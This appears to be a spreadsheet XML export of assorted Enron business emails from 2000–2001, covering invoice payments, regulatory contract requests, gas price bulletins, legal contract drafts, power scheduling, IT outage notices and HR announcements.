Cc: Booth, Chris; Dennis, Tonya; Clark, Catherine; Edmonds, Marcus_x000D_
Subject: Payment of GE Invoice_x000D_
_x000D_
Ben_x000D_
_x000D_
The Turbopark funds request for all payments to be made next month needs to _x000D_
be submitted by Tuesday, June 12th.  This request covers the period from June _x000D_
15th to July 15th.  Are we planning to pay the $1.5 MM invoice from GE during _x000D_
this time period?  If so, I will have accounting request the funds.  If we're _x000D_
not sure if the payment will be made or not, it is better not to request the _x000D_
funds.  In this case, the payment can be treated as an "actual" for that _x000D_
month and backed out of the advance for next month.  Please let me know which _x000D_
course of action you would like to take.  _x000D_
_x000D_
Thanks,_x000D_
Rebecca   _x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 26 Nov 2001 07:25:59 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'lamar.frazier@enron.com'})</t>
  </si>
  <si>
    <t>ACTION REQUIRED: CA Contracts</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
Bad email address initially..._x000D_
_x000D_
_x000D_
EESHOU-LN12/EES, EESHOU-LN12/EES_x000D_
_x000D_
_________________________x000D_
_x000D_
_x000D_
To:	Michael Mann/Enron@EnronXGate, Angela Schwarz/Enron@EnronXGate, Greg Sharp/Enron@EnronXGate, David Cox/Enron@EnronXGate, Gayle W Muench/Enron@EnronXGate_x000D_
cc:	Jeremy Blachman/Enron@EnronXGate, James D Steffes/HOU/EES@EES, Kevin Keeney/HOU/EES@EES, Diann Huddleson/HOU/EES@EES_x000D_
From:	Lamar Frazier/HOU/EES_x000D_
Date:	11/21/2001 01:30:34 PM_x000D_
Subject:	ACTION REQUIRED: CA Contracts_x000D_
_x000D_
_x000D_
There has been significant recent activity at the CPUC, specifically an effort by one of the commissioners to obtain copies of every DA contract in CA.  The commissioner has sent this order both to ESP's and customer's alike.  Jim Steffes and I are working to pull together a defensive strategy for both us and our customer's.  What I need from each of you by COB Monday 11/26 is a comprehensive list of your CA customer's that are EES DA customer's in CA.  I will also need to know which of your customer's is Enron obligated to add additional customer facilities.  _x000D_
_x000D_
Jim hopes to have something in draft form for our review by COB Tuesday.  I have included a copy of the decision for your review.  Any and all suggestions, thoughts (keep it clean), or ideas are welcomed. _x000D_
_x000D_
Regards,_x000D_
_x000D_
Lamar_x000D_
_x000D_
_x000D_
Diann - Can we get together on Monday to discuss CPUC fillings we have made to date.  Specifically fillings/disclosures inwhich we identified our CA customer's. _x000D_
 - CPUC01-#110768-v1-A9807003_et_al_Wood_Ruling_.doc _x000D_
</t>
  </si>
  <si>
    <t>_x000D_
_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                   IntercontinentalExchange                =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                            =20_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                   Firm Physical Natural Gas Price Bulletin                =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                            =20_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                   For Natural Gas Delivered on Tuesday, November  27, 2001=_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                  =20_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                   (Trade Date of Monday, November  26, 200=_x000D_
1)                                                                         =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                          =20_x000D_
Click here to access index history</t>
  </si>
  <si>
    <t>Wed, 1 Nov 2000 10:37:00 -0800 (PST)</t>
  </si>
  <si>
    <t>GE Contract</t>
  </si>
  <si>
    <t xml:space="preserve">Hi Dale,_x000D_
_x000D_
We are meeting with GE tomorrow to talk about this.  Please let me know if _x000D_
you have any suggestions or comments.  Ditto on the ABB agreement which I _x000D_
forwarded not too long ago._x000D_
_x000D_
Kay_x000D_
---------------------- Forwarded by Kay Mann/Corp/Enron on 11/01/2000 06:31 _x000D_
PM ---------------------------_x000D_
_x000D_
_x000D_
"Cope, Lori" &lt;loricope@akllp.com&gt; on 11/01/2000 03:00:50 PM_x000D_
To: "Kay Mann (E-mail)" &lt;Kay.Mann@Enron.com&gt;_x000D_
cc:  _x000D_
_x000D_
Subject: GE Contract_x000D_
_x000D_
_x000D_
Enclosed please find clean and blacklined versions of the GE Contract._x000D_
The blackline of the Agreement identifies the changes from the draft I_x000D_
sent you. Note that no blackline of the Exhibits was necessary because_x000D_
it contained no references to WestLB._x000D_
Regards,_x000D_
Paul_x000D_
_x000D_
 &lt;&lt;HOU_554886_3.DOC&gt;&gt;  &lt;&lt;BL554888.DOC&gt;&gt;  &lt;&lt;HOU_554888_4.DOC&gt;&gt;_x000D_
Paul J. Pipitone_x000D_
Andrews &amp; Kurth L.L.P._x000D_
4200 Chase Tower_x000D_
600 Travis_x000D_
Houston, Texas  77002_x000D_
Phone: 713-220-4101_x000D_
Fax:  713-238-7176_x000D_
ppipitone@andrews-kurth.com_x000D_
_x000D_
The information contained in this e-mail message is legally privileged_x000D_
and confidential information intended only for the use of the_x000D_
recipient(s) named above.  If the reader of this e-mail is not an_x000D_
intended recipient, you have received this e-mail in error and any_x000D_
review, dissemination, distribution or copying is strictly prohibited._x000D_
If you have received this e-mail in error,  please notify the sender_x000D_
immediately by return e-mail and permanently delete the copy you_x000D_
received._x000D_
_x000D_
Thank you._x000D_
_x000D_
_x000D_
_x000D_
 - HOU_554886_3.DOC_x000D_
 - BL554888.DOC_x000D_
 - HOU_554888_4.DOC_x000D_
</t>
  </si>
  <si>
    <t>Mon, 23 Oct 2000 05:54:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Sunday Palo Verde Preschedules</t>
  </si>
  <si>
    <t xml:space="preserve">On Friday night we discovered that the planned maintenance at Palo Verde for _x000D_
Sunday was  a "go" again.     The cash traders/preschedulers had been told _x000D_
that the work was cancelled._x000D_
_x000D_
R. Slinger and Leaf rerouted 150mw's of onpeak energy  that was routed/tagged _x000D_
to go to the PX,   saving the company $48,096.   The PX cleared for zero's _x000D_
much of the onpeak hours, as there was major cong. at PV.    They sold to LA _x000D_
directly 100 mw's and also booked out 50mw's with the generator (TEP) of one _x000D_
of the preschedules.    Our desk retained the majority of the savings, as _x000D_
indicated below._x000D_
_x000D_
This was a good exercise,   as it demonstrates how we can "jump chain" on _x000D_
certain curtailed paths and settle directly with the generator's to avoid _x000D_
inadvertancy.  _x000D_
This was done and the system balanced perfectly._x000D_
_x000D_
Good job!!_x000D_
_x000D_
JMF_x000D_
_x000D_
_x000D_
_x000D_
---------------------- Forwarded by John M Forney/HOU/ECT on 10/23/2000 02:21 _x000D_
PM ---------------------------_x000D_
From: John M Forney on 10/23/2000 08:37 AM_x000D_
To: Mark Fischer/PDX/ECT@ECT_x000D_
cc:  _x000D_
Subject: Sunday Palo Verde Preschedules_x000D_
_x000D_
Mark,_x000D_
As discussed,   we've rerouted your onpeak Palo Verde (150 mw's) schedules _x000D_
that were destined to go to the P/X,    We sold 100 mw's to LADWP for $38 - _x000D_
see deal #440641.   We also booked out 50mw's at $50 with TEP - see deal _x000D_
#440642.     _x000D_
For ease of accounting,  these sales were entered under your book,  ST SW,  _x000D_
so you are flat for this day._x000D_
_x000D_
The P/X onpeak average was, as I calculated,  $21.96._x000D_
The wt. avg price of the bookout/ sales agreements was $42.   The net,  of _x000D_
course,  is $20.04._x000D_
_x000D_
Enron saved:_x000D_
_x000D_
$20.04 * 150mw's  * 16 hrs =  $48,096_x000D_
_x000D_
Our split was 70%,  so we should enter an annuity for this amount,  _x000D_
$33,667.20._x000D_
_x000D_
If you agree,  let me know and I will enter the deal._x000D_
_x000D_
_x000D_
Thanks for the "heads up."  This was a good call for the company._x000D_
_x000D_
_x000D_
JMF_x000D_
 _x000D_
</t>
  </si>
  <si>
    <t>Wed, 25 Apr 2001 08:47:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'joan.quick@enron.com', 'susan.smith@enron.com', 'marilyn.colbert@enron.com', 'michael.morris@enron.com', 'sylvia.campos@enron.com', 'faye.ellis@enron.com', 'genia.fitzgerald@enron.com', 'kelly.lombardi@enron.com', 'patrice.mims@enron.com', 'brad.coleman@enron.com', 'kelly.carrington@enron.com', 'sylvia.pollan@enron.com', 'connie.sutton@enron.com', 'steve.watson@enron.com', 'lisa.carver@enron.com', 'elizabeth.hernandez@enron.com', 'larry.hunter@enron.com', 'edward.terry@enron.com', 'dianne.seib@enron.com', 'melissa.graves@enron.com', 'christa.winfrey@enron.com', 'kenneth.harmon@enron.com', 'bryce.baxter@enron.com', 'shonnie.daniel@enron.com', 'stephanie.panus@enron.com', 'jeff.richter@enron.com', 'lane.alexander@enron.com', 'anita.patton@enron.com', 'elsa.villarreal@enron.com', 'colleen.sullivan@enron.com', 'anthony.campos@enron.com', 'vance.taylor@enron.com', 'bill.hare@enron.com', 'irene.flynn@enron.com', 'jason.moore@enron.com', 'victor.lamadrid@enron.com', 'debbie.brackett@enron.com', 'amelia.alland@enron.com', 'errol.mclaughlin@enron.com', 'mark.thorne@enron.com', 'richard.miley@enron.com', 'samuel.schott@enron.com', 'mary.smith@enron.com', 'laura.vargas@enron.com', 'oscar.rivera@enron.com', 'lisa.cousino@enron.com', 'kimberlee.bennick@enron.com', 'donald.reinhardt@enron.com', 'boyd.coble@enron.com', 'brenda.herod@enron.com', 'scotty.gilbert@enron.com', 'clem.cernosek@enron.com', 'cregg.lancaster@enron.com', 'jennifer.oliver@enron.com', 'john.powell@enron.com', 'bernice.rodriguez@enron.com', 'product.houston@enron.com', 'susan.elledge@enron.com', 'kate.symes@enron.com', 'james.scribner@enron.com', 'ellen.wallumrod@enron.com', 'kathryn.bussell@enron.com', 'peggy.hedstrom@enron.com', 'andrew.lewis@enron.com', 'richard.mckeel@enron.com', 'chris.mallory@enron.com', 'edward.baughman@enron.com', 'daren.farmer@enron.com', 'geoff.storey@enron.com', 'lauri.allen@enron.com', 'shemeika.landry@enron.com', 'kim.theriot@enron.com', 'russell.diamond@enron.com', 'nanette.kettler@enron.com', 'jefferson.sorenson@enron.com', 'bridgette.anderson@enron.com', 'rahil.jafry@enron.com', 'tammie.huthmacher@enron.com', 'lisa.valderrama@enron.com', "romeo.d'souza@enron.com", 'sanjeev.gupta@enron.com', 'scott.lytle@enron.com', 'cheryl.dawes@enron.com', 'carrie.southard@enron.com', 'marilyn.schoppe@enron.com', 'gary.lamphier@enron.com', 'enron.facilities@enron.com', 'walter.guidroz@enron.com', 'willie.stewart@enron.com', 'scott.mills@enron.com', 'john.nowlan@enron.com', 'shawna.flynn@enron.com', 'veronica.espinoza@enron.com', 'marlene.hilliard@enron.com', 'karen.lambert@enron.com', 'george.weissman@enron.com', 'kori.loibl@enron.com', 'ralph.douglas@enron.com', 'sony.wilson@enron.com', 'richard.pinion@enron.com', 'enron.counterparty@enron.com', 'mike.croucher@enron.com', 'tom.moore@enron.com', 'carlos.rodriguez@enron.com', 'cheryl.dudley@enron.com', 'rhonda.denton@enron.com', 'stacey.white@enron.com', 'linda.bryan@enron.com', 'claire.viejou@enron.com', 'hoong.foon@enron.com', 'andrea.guillen@enron.com', 'sherry.dawson@enron.com', 'jim.little@enron.com', 'glenda.mitchell@enron.com', 'stacy.dickson@enron.com', 'elsie.lew@enron.com', 'julie.meyers@enron.com', 'carolyn.gilley@enron.com', 'robert.cotten@enron.com', 'randall.gay@enron.com', 'jenny.latham@enron.com', 'cary.carrabine@enron.com', 'phillip.platter@enron.com', 'nathan.hlavaty@enron.com', 'debra.perlingiere@enron.com', 'katherine.kelly@enron.com', 'monica.lande@enron.com', 'amita.gosalia@enron.com', 'philippe.travis@enron.com', 'karin.williams@enron.com', 'michael.eiben@enron.com', 'colette.weinreich@enron.com', 'liz.hillman@enron.com', 'hillary.mack@enron.com', 'rudwell.johnson@enron.com', 'tracy.ngo@enron.com', 'd.hall@enron.com', 'jeremy.morris@enron.com', 'stacie.guidry@enron.com', 'anne.bike@enron.com', 'veronica.thompson@enron.com', 'nidia.mendoza@enron.com', 'brad.schneider@enron.com', 'dale.newberger@enron.com', 'darren.vanek@enron.com', 'b.palmer@enron.com', 'david.hardy@enron.com', 'susan.trevino@enron.com', 'matilda.machado@enron.com', 'jeremy.wong@enron.com', 'sam.round@enron.com', 'diane.ellstrom@enron.com', 'regina.perkins@enron.com', 'jim.homco@enron.com', 'laurel.adams@enron.com', 'brant.reves@enron.com', 'suzy.robey@enron.com', 'jason.williams@enron.com', 'john.swinney@enron.com', 'sharon.gonzales@enron.com', 'michelle.laurant@enron.com', 'rita.wynne@enron.com', 'michele.small@enron.com', 'donna.consemiu@enron.com', 'arfan.aziz@enron.com', 'bruce.mills@enron.com', 'pat.clynes@enron.com', 'cindy.horn@enron.com', 'georgia.blanchard@enron.com', 'spencer.teel@enron.com', 'cathy.harris@enron.com', 'cyndie.balfour-flanagan@enron.com', 'carla.hoffman@enron.com', 'troy.klussmann@enron.com', 'lynn.shivers@enron.com', 'tana.jones@enron.com', 'debbie.nicholls@enron.com', 'stacey.richardson@enron.com', 'winston.goodbody@enron.com', "o'neal.winfree@enron.com", 'jennifer.blay@enron.com', 'leslie.reeves@enron.com', 'bob.bowen@enron.com', 'bob.hall@enron.com'})</t>
  </si>
  <si>
    <t>Name Change/Merger revised Report</t>
  </si>
  <si>
    <t>To Everyone,_x000D_
_x000D_
The following are revisions to the final report for April 2001.  I am _x000D_
providing details here, and the updated report is also attached.  _x000D_
_x000D_
Tom Brown Resources Ltd., CP ID 96309 is the result of an amalgamation with _x000D_
Stellarton Energy Corporation, CP ID 64040.  Stellarton Energy Corporation _x000D_
will be inactivated on 05/01/01.  Have Certificate of Amalgamation and _x000D_
Articles of Amalgamation in hand._x000D_
_x000D_
Please also note that the Western Area Power Administration-"Upper Great _x000D_
Plain" record, CP ID 81177, will be corrected to read "Western Area Power _x000D_
Administration-"Upper Great Plains Region".  The record that was overlayed _x000D_
per the report, CP ID 35194, will be inactivated as a duplicate record.  _x000D_
These changes have been included on this revised report and the changes have _x000D_
been made in GCP today.  These are branch locations by geographic area of the _x000D_
US Dept. of Energy, and there is no documentation for these changes._x000D_
_x000D_
I have also just received a name correction that may as well be included in _x000D_
this report -_x000D_
      From Greer Comm. of Public Works, CP ID 36393, to Commission of Public _x000D_
Works, City of Greer_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Please call me with any questions or concerns._x000D_
_x000D_
Thanks,_x000D_
Cheryl x33103</t>
  </si>
  <si>
    <t>Thu, 4 Oct 2001 13:01:44 -0700 (PDT)</t>
  </si>
  <si>
    <t>Weekend Outage Report for 10-5-01 through 10-7-01</t>
  </si>
  <si>
    <t>_x000D_
_x000D_
------------------------------------------------------------------------------------------------------_x000D_
W E E K E N D   S Y S T E M S   A V A I L A B I L I T Y_x000D_
_x000D_
F O R_x000D_
_x000D_
October 5, 2001 5:00pm through October 8, 2001 12:00am_x000D_
------------------------------------------------------------------------------------------------------_x000D_
	    		   		_x000D_
SCHEDULED SYSTEM OUTAGES: _x000D_
_x000D_
ARDMORE DATA CENTER - FACILITY OPERATIONS: No Scheduled Outages._x000D_
_x000D_
AZURIX: No Scheduled Outages._x000D_
_x000D_
EB34 DATA CENTER - FACILITY OPERATIONS: No Scheduled Outages._x000D_
_x000D_
EDI SERVER: No Scheduled Outages._x000D_
 _x000D_
EES: _x000D_
Impact:  EES_x000D_
Time:  Sat 10/6/2001 at  6:00:00 PM CT thru Sun 10/7/2001 at  12:00:00 AM CT_x000D_
	Sat 10/6/2001 at  4:00:00 PM PT thru Sat 10/6/2001 at  10:00:00 PM PT_x000D_
	Sun 10/7/2001 at  12:00:00 AM London thru Sun 10/7/2001 at  6:00:00 AM London_x000D_
Outage:  Migrate EESHOU-FS1 to SAN_x000D_
Environments Impacted:  EES_x000D_
Purpose: New Cluster server is on SAN and SAN backups_x000D_
This will provide better performance, server redundancy, and backups should complete without problems._x000D_
Backout: Take new server offline,_x000D_
Bring up old servers_x000D_
change users profiles back to original settings._x000D_
Contact(s): 	Roderic H Gerlach    713-345-3077_x000D_
  _x000D_
ENRON CENTER SOUTH DATA CENTER - FACILITY OPERATIONS: No Scheduled Outages_x000D_
_x000D_
ENRON NORTH AMERICAN LANS:  _x000D_
Impact:  CORP_x000D_
Time:  Fri 10/5/2001 at  10:00:00 PM CT thru Fri 10/5/2001 at  10:15:00 PM CT_x000D_
	Fri 10/5/2001 at    8:00:00 PM PT thru Fri 10/5/2001 at    8:15:00 PM PT_x000D_
	Sat 10/6/2001 at  4:00:00 AM London thru Sat 10/6/2001 at  4:15:00 AM London_x000D_
Outage:  Maintenance 63 Network_x000D_
Environments Impacted:  Corp_x000D_
Purpose: Maintenance on the 172.16.63.0 network_x000D_
Backout: _x000D_
Contact(s): 	George Nguyen    713-853-0691_x000D_
 _x000D_
FIELD SERVICES:  No Scheduled Outages._x000D_
_x000D_
INTERNET: No Scheduled Outages._x000D_
_x000D_
MESSAGING: _x000D_
Impact:  Corp Notes_x000D_
Time:  Fri 10/5/2001 at  9:00:00 PM CT thru Sat 10/6/2001 at  1:00:00 AM CT_x000D_
	Fri 10/5/2001 at  7:00:00 PM PT thru Fri 10/5/2001 at  11:00:00 PM PT_x000D_
	Sat 10/6/2001 at  3:00:00 AM London thru Sat 10/6/2001 at  7:00:00 AM London_x000D_
Outage:  cNotes Server Reboots_x000D_
Environments Impacted:  All users on any of the mailservers listed below_x000D_
Purpose: Scheduled @ 2 week interval_x000D_
Backout: Make sure server comes up._x000D_
Contact(s): 	Trey Rhodes  (713) 345-7792  _x000D_
		    		    		    		_x000D_
Impact:  EI_x000D_
Time:  Fri 10/5/2001 at  9:00:00 PM CT thru Sat 10/6/2001 at  1:00:00 AM CT_x000D_
	Fri 10/5/2001 at  7:00:00 PM PT thru Fri 10/5/2001 at  11:00:00 PM PT_x000D_
	Sat 10/6/2001 at  3:00:00 AM London thru Sat 10/6/2001 at  7:00:00 AM London_x000D_
Outage:  EI Notes Server Maintenance_x000D_
Environments Impacted:  EI Local/Domestic/Foreign Sites_x000D_
Purpose: Scheduled @ 2 week interval_x000D_
Backout: N/A_x000D_
Contact(s): 	David Ricafrente    713-646-7741_x000D_
_x000D_
Impact:  _x000D_
Time:  Fri 10/5/2001 at  9:00:00 PM CT thru Fri 10/5/2001 at  11:45:00 PM CT_x000D_
	Fri 10/5/2001 at  7:00:00 PM PT thru Fri 10/5/2001 at    9:45:00 PM PT_x000D_
	Sat 10/6/2001 at  3:00:00 AM London thru Sat 10/6/2001 at  5:45:00 AM London_x000D_
Outage:  Upgrade Test for XTND_x000D_
Environments Impacted:  Corp_x000D_
Purpose: Properly test new configuration files for upgrade before production phase._x000D_
Backout: Put configuration files back to original settings._x000D_
Contact(s): 	Edgar Gallegos    713-345-5634_x000D_
_x000D_
MARKET DATA: No Scheduled Outages._x000D_
_x000D_
NT: No Scheduled Outages._x000D_
_x000D_
OS/2:  No Scheduled Outages._x000D_
_x000D_
OTHER: _x000D_
Impact:  HR_x000D_
Time:  Fri 10/5/2001 at  7:00:00 PM CT thru Fri 10/5/2001 at  8:00:00 PM CT_x000D_
	Fri 10/5/2001 at  5:00:00 PM PT thru Fri 10/5/2001 at  6:00:00 PM PT_x000D_
	Sat 10/6/2001 at  1:00:00 AM London thru Sat 10/6/2001 at  2:00:00 AM London_x000D_
Outage:  Reboot HR-DB-4_x000D_
Environments Impacted:  All HR Global applications._x000D_
Purpose: More SAN disk space is needed to databases on HR-DB-4_x000D_
Backout: _x000D_
Contact(s): 	Brandon Bangerter    713-345-4904_x000D_
		Mark Calkin                713-345-7831  713-410-1624_x000D_
		Raj Perubhatla          713-345-8016  281-788-9307_x000D_
		    				    		    		    				    		    		_x000D_
Impact:  CORP_x000D_
Time:  Sat 10/6/2001 at  12:00:00 PM CT thru Sat 10/6/2001 at  10:00:00 PM CT_x000D_
	Sat 10/6/2001 at  10:00:00 AM PT thru Sat 10/6/2001 at    8:00:00 PM PT_x000D_
	Sat 10/6/2001 at  6:00:00 PM London thru Sun 10/7/2001 at  4:00:00 AM London_x000D_
Outage:  A3500 disk controller maintenance for Enlighten server frissure._x000D_
Environments Impacted:  Enlighten_x000D_
Purpose: Need to address repeat issues with controller._x000D_
Backout: Role back to the original equipment and configuration. Even with the controller offline there is built in redundancy._x000D_
Contact(s): 	Malcolm Wells    713-345-3716_x000D_
		    		    		    		_x000D_
Impact:  ENW - UNIX_x000D_
Time:  Fri 10/5/2001 at  8:00:00 PM CT thru Sun 10/7/2001 at  11:00:00 PM CT_x000D_
	Fri 10/5/2001 at  6:00:00 PM PT thru Sun 10/7/2001 at    9:00:00 PM PT_x000D_
	Sat 10/6/2001 at  2:00:00 AM London thru Mon 10/8/2001 at  5:00:00 AM London_x000D_
Outage:  Large-Scale Migration of Production Data (Solar)_x000D_
Environments Impacted:  UniX Users. There will be a TOTAL OUTAGE from Saturday midnight until Sunday 6am. We may need to reboot clients that do not properly unmount solar's filesystems, especially SunOS clients. _x000D_
Purpose: solar  is being decommissioned.  FDDI network is failing, NetApps offer a big performance improvement_x000D_
Backout: Unmount any clients on the NetApps. Revert to saved automount maps. Re-enable NFS services on Solar. Scan NetApps for files updated since migration and move or rdist them back._x000D_
Contact(s): 	Mike Croucher    _x000D_
		Adam DeRidder  (713) 853-1428  813/318.0831_x000D_
		Carlos Uribe  (713) 345-8179  _x000D_
		Bob McAuliffe    _x000D_
				    		    		    		_x000D_
Impact:  CORP_x000D_
Time:  Sat 10/6/2001 at    2:00:00 AM CT thru Sat 10/6/2001 at    2:00:00 PM CT_x000D_
	Sat 10/6/2001 at  12:00:00 AM PT thru Sat 10/6/2001 at  12:00:00 PM PT_x000D_
	Sat 10/6/2001 at  8:00:00 AM London thru Sat 10/6/2001 at  8:00:00 PM London_x000D_
Outage:  DCAF II / AUTOFAX Oracle Database Server Migration &amp; Upgrade_x000D_
Environments Impacted:  ENA_x000D_
Purpose: Migrate database to a newer server. Upgrade database to the newer version supported by Oracle._x000D_
Backout: Redirect tnsnames.ora to the existing old database server._x000D_
Contact(s): 	Alex Hsieh  713-853-6561  713-288-1779_x000D_
 _x000D_
SITARA:  _x000D_
Impact:  Sitara/CPR_x000D_
Time:  Sat 10/6/2001 at  8:00:00 PM CT thru Sun 10/7/2001 at  7:00:00 AM CT_x000D_
	Sat 10/6/2001 at  6:00:00 PM PT thru Sun 10/7/2001 at  5:00:00 AM PT_x000D_
	Sun 10/7/2001 at  2:00:00 AM London thru Sun 10/7/2001 at  1:00:00 PM London_x000D_
Outage:  Sitara/CRP impact due to Solar Migration _x000D_
Environments Impacted:  Sitara/CPR production_x000D_
Purpose: New hardware migration to done by Enterprise Storage Team_x000D_
Backout: _x000D_
Contact(s): 	SitaraonCall    713-288-0101_x000D_
		CPRonCall    713-284-4175_x000D_
 _x000D_
SUN/OSS SYSTEM: No Scheduled Outages._x000D_
_x000D_
TELEPHONY: No Scheduled Outages_x000D_
_x000D_
TERMINAL SERVER:  No Scheduled Outages._x000D_
_x000D_
UNIFY:  No Scheduled Outages._x000D_
_x000D_
-----------------------------------------------------------------------------------------------------------------------------_x000D_
								FOR ASSISTANCE_x000D_
_x000D_
(713) 853-1411   Enron Resolution Center_x000D_
_x000D_
_x000D_
Specific Help:_x000D_
Information Risk Management			(713) 853-5536_x000D_
SAP/ISC                                                                               (713) 345-4727_x000D_
Unify On-Call 					(713) 284-3757  [Pager]_x000D_
Sitara On-Call					(713) 288-0101  [Pager]_x000D_
RUS/GOPS/GeoTools/APRS			(713) 639-9726  [Pager]_x000D_
OSS/UA4/TARP				(713) 285-3165  [Pager]_x000D_
CPR						(713) 284-4175  [Pager]_x000D_
EDI Support 					(713) 327-3893  [Pager]_x000D_
EES Help Desk					(713)853-9797 OR (888)853-9797_x000D_
TDS -Trader Decision Support On-Call                    (713) 327-6032 [Pager]</t>
  </si>
  <si>
    <t>Fri, 20 Oct 2000 13:22:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Enron's Year-End 2000 Performance Management Process opens on:_x000D_
_x000D_
WEDNESDAY, OCTOBER 25th._x000D_
_x000D_
During this process, you will be able to suggest reviewers who can provide _x000D_
feedback on your performance.  In addition, you may be requested to provide _x000D_
feedback on fellow employees.  To participate in the feedback process, access _x000D_
the Performance Management System (PEP) at http://pep.corp.enron.com .   Your _x000D_
UserID and Password are provided below._x000D_
_x000D_
The system will be open for feedback from October 25th - November 17th, and _x000D_
Help Desk representatives will be available to answer questions throughout _x000D_
the process.  You may contact the Help Desk at:_x000D_
_x000D_
Houston:  1-713-853-4777, Option 4_x000D_
London:  44-207-783-4040, Option 4_x000D_
E-mail:  perfmgmt@enron.com_x000D_
_x000D_
During the year-end PRC process, employee profiles will be made available at _x000D_
meetings.   If you haven't already done so, we encourage you to update your _x000D_
personal information and current responsibilities before the meeting process _x000D_
begins on November 20th.  Please access eHRonline at _x000D_
http://ehronline.enron.com (London users please go to http://home.enron.co.uk _x000D_
, click on Quick Links, and choose HR Online)._x000D_
_x000D_
Your User ID &amp; Password are:_x000D_
_x000D_
User ID: 90125268_x000D_
_x000D_
Password: WELCOME</t>
  </si>
  <si>
    <t>Tue, 8 May 2001 01:25:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'rudy.acevedo@enron.com'})</t>
  </si>
  <si>
    <t>---------------------- Forwarded by Juan Hernandez/Corp/Enron on 05/08/2001 _x000D_
08:25 AM ---------------------------_x000D_
   Enron Americas - Office of the Chairman_x000D_
From: Enron Americas - Office of the Chairman on 05/04/2001 08:17 AM_x000D_
Sent by: Enron Announcements_x000D_
To: All Enron Worldwide_x000D_
cc:  _x000D_
Subject: Organization Announcement_x000D_
_x000D_
Given the growth in EES it has become apparent that it is time to consolidate _x000D_
the risk functions between EES and EWS.  This will provide EES with the _x000D_
systems, resources and risk expertise of the wholesale energy groups _x000D_
necessary for it to continue to grow and take advantage of current market _x000D_
opportunities._x000D_
_x000D_
With this in mind and in agreement with the management of EES, two new risk _x000D_
groups inside Enron Americas will be formed to provide EES with pricing, _x000D_
structuring, retail and wholesale commodity risk management, logistics and _x000D_
back-office services.  These groups main function is to provide these _x000D_
services to EES.  We have asked Rogers Herndon, currently Vice _x000D_
President-Trading in the Eastern Power Group to manage this function in the _x000D_
Eastern Interconnect (this includes both gas and power).  Rogers will _x000D_
continue to report to Kevin Presto.  We have asked Don Black, formerly Vice _x000D_
President-EES Risk Management and Sourcing, to manage this function in the _x000D_
Western U.S.  Don will manage this group from Houston and will report to Tim _x000D_
Belden._x000D_
_x000D_
These groups will work very closely with EES to pursue shared goals while _x000D_
ensuring close coordination with the wholesale gas and power trading _x000D_
organizations._x000D_
_x000D_
These changes are effective immediately.  Please congratulate Rogers and Don _x000D_
on their new roles._x000D_
_x000D_
_x000D_
John Lavorato &amp; Louise Kitchen</t>
  </si>
  <si>
    <t>Travel Plans</t>
  </si>
  <si>
    <t>Elena, with Imax Town Cars, will pick you up today at 1:40 p.m. You now have _x000D_
a reservation with National Car Rental in Houston from today until Saturday _x000D_
morning. Your reservation number is 808752919. You can either check in at the _x000D_
National desk next to baggage claim and then catch the shuttle to the parking _x000D_
lot, or you can catch the shuttle first and fill out paperwork once you get _x000D_
out there. Have a great time in Houston.</t>
  </si>
  <si>
    <t>Tue, 19 Jun 2001 07:12:29 -0700 (PDT)</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
   _x000D_
_x000D_
Debra Perlingiere_x000D_
Enron North America Legal_x000D_
1400 Smith Street, EB 3885_x000D_
Houston, Texas 77002_x000D_
